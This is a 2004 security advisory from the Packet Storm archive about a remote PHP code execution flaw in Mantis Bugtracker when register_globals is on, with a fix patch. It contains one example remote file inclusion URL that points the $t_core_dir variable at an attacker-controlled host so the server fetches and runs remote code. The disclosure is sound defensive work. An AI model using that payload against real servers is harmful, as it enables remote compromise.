what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

mantisPHP.txt

mantisPHP.txt
Posted Aug 24, 2004
Authored by Joxean Koret

Mantis suffers from a remote PHP code execution vulnerability when the REGISTER_GLOBAL variable is set.

tags | advisory, remote, php, code execution
SHA-256 | a70413a0d6384063116146614076f527699b5ef8da05f1e7d3c3af253afadf40

mantisPHP.txt

Change Mirror Download


---------------------------------------------------------------------------
Mantis Bugtracker Remote PHP Code
Execution Vulnerability
---------------------------------------------------------------------------

Author: Joxean Koret
Date: 08-01-2004
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Mantis Bugtracker

Mantis is a web-based bugtracking system. It is
written in the PHP scripting
language and requires the MySQL database and
a webserver.

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Remote PHP Code Execution Vulnerability

A1. If the REGISTER_GLOBAL variable is set an
attacker can execute arbitrary
php code by overwriting the global variable
$t_core_dir with our desired url
(for example
http://localhost/mantis/core/bug_api.php?t_core_dir=http://fucking.site.com/)

The following files are vulnerables :

bug_api.php -> at line 22? (using variable
$t_core_path)
relationship_api.php -> Line 14 (using variable
$t_core_dir)

The fix:
~~~~~~~~

Both of these issues have now been fixed in
CVS.

There is also a Patch for the Mantis 0.19.0a
version

=====================================================================
mantis.patch

bug_api.php
@@ -19,7 +19,7 @@
require_once( $t_core_dir .
'sponsorship_api.php' );

# MASC RELATIONSHIP
-
require_once( $t_core_path.'relationship_api.php' );
+
require_once( $t_core_dir.'relationship_api.php' );
# MASC RELATIONSHIP

and to relationship API:
### Relationship API ###

+ $t_core_dir =
dirname( __FILE__ ).DIRECTORY_SEPARATOR;
+
require_once( $t_core_dir .
'collapse_api.php' );

# MASC RELATIONSHIP

=====================================================================
---------------------------------------------------------------------------
Contact:
~~~~~~~~

Joxean Koret at
joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es



Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close